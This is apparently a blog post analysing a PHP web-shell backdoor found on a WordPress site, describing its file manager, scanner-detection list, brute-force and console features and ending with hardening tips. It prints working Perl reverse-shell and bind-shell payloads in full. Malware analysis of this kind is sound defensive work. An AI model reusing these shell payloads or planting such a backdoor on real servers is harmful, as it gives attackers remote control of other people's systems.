Tuesday, May 26, 2015

PHP Backdoor File Analysis

Moved to New Site

An attack file found by Dylan over at: http://closingtags.com/
Source code with annotations
File named wp-class.php
Is stored as such:
eval(base64_decode("Ly8kYXV0aHBhc3MgPSAiN...
Encoded in a long encoded string, to help hide the contents.

General Info:
This file is for maintaining access after a backdoor is found, containing a command interface for Windows and Unix, some GUI tools, and a some self preservation functionality.

The backdoor functionality is only available if you have a cookie with the correct password set.
$authpass = "7b24afc8bc80e548d66c4e7ff72171c5";
That password is an MD5 hash of the word 'toor' which is root backwards.
Just a simple password makes me think that this is the work of a script kiddy versus an actual hacker.

The functionality of the php program is run thru one of the last lines
call_user_func('action' . $_POST['a']);

Which is just a callback function. So depending on the Post value any of the "action*" functions can be used, with the default being FilesGirls

Functions
FilesGirl is a file management form that is rendered in wsoFooter() and looks similar to the image below.
Functions come from a case-switch based on a hidden field named 'p1'
case 'uploadFile' -> Uploads a file
case 'delete': -> will recursively work through a directory and unlink the contents
case 'paste': - > based off of $_COOKIE['act'] a file is moved, copied, zipped, or unzipped.
section of backdoor gui






actionSecInfo()
One of the more interesting things inside that function is the three lists
$userful <- "their typo, not mine"
$danger, and
$downloaders
Here is a full one: $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');

It'll then cycle thru the 3 lists calling function wsoWhich($p)

function wsoWhich($p) {
    $path = wsoEx('which ' . $p);
    if(!empty($path))
        return $path;
    return false;
}
//which is a Unix command used to identify the location of executables

A curious thing is that the backdoor will retrieve information to the attacker about possible scanners that would discover this attack file, but only in the Unix environment.
It doesn't try and self sustain in a Windows environment, maybe because almost no one runs WordPress in a Windows environment.

There is a function to remove the attack file from the server
function actionSelfRemove()


actionNetwork()
Contains two encoded variables $back_connect_p and $bind_port_p you can look at the value in the source code.
$back_connect_p =
#!/usr/bin/perl
use Socket;
$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system('/bin/sh -i');
close(STDIN);
close(STDOUT);
close(STDERR);

and
 
$bind_port_p =
#!/usr/bin/perl
$SHELL="/bin/sh -i";
if (@ARGV &lt; 1) { exit(1); }
use Socket;
socket(S,&amp;PF_INET,&amp;SOCK_STREAM,getprotobyname('tcp')) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($ARGV[0],INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1) {
    accept(CONN,S);
    if(!($pid=fork)) {
        die "Cannot fork" if (!defined $pid);
        open STDIN,"&lt;&amp;CONN";
        open STDOUT,"&gt;&amp;CONN";
        open STDERR,"&gt;&amp;CONN";
        exec $SHELL || die print CONN "Cant execute $SHELL\n";
        close CONN;
        exit 0;
    }
}
These functions allow the attacker to open specific ports on he server.

actionBruteforce()
Defines a particular version of wsoBruteForce() that does brute force log in attempts of a ftp, mysql, or pgsql servers.

actionConsole()
Creates a textarea that can be used to enter console commands to the server.

actionSql()
Predefined set of sql commands for ease of gathering data.

Doing some google fu, it is possible to find that there is some history with the file called "wp-class.php" and there are even some instances where the file is still active.
What should be your take away?
Regularly check or ports.
Know the default files needed for your CMS.
Keep your CMS updated.
Learn to decode files at http://ddecode.com/phpdecoder/
Posted by at

2 comments:

  1. UnknownOctober 15, 2015 at 12:53 PM

    In web development PHP is no doubt highly used and preferred programming. But we have to admit that PHP 5 unleashed itself with its advanced features, people understood its power.
    php

    ReplyDelete
  2. UnknownDecember 9, 2015 at 3:00 AM

    I am also genuinely keen of learning Personal home pages programming, except I am new one, I forever used to examine articles related to PHP programming.
    php training in jaipur

    ReplyDelete

Subscribe to: Post Comments (Atom)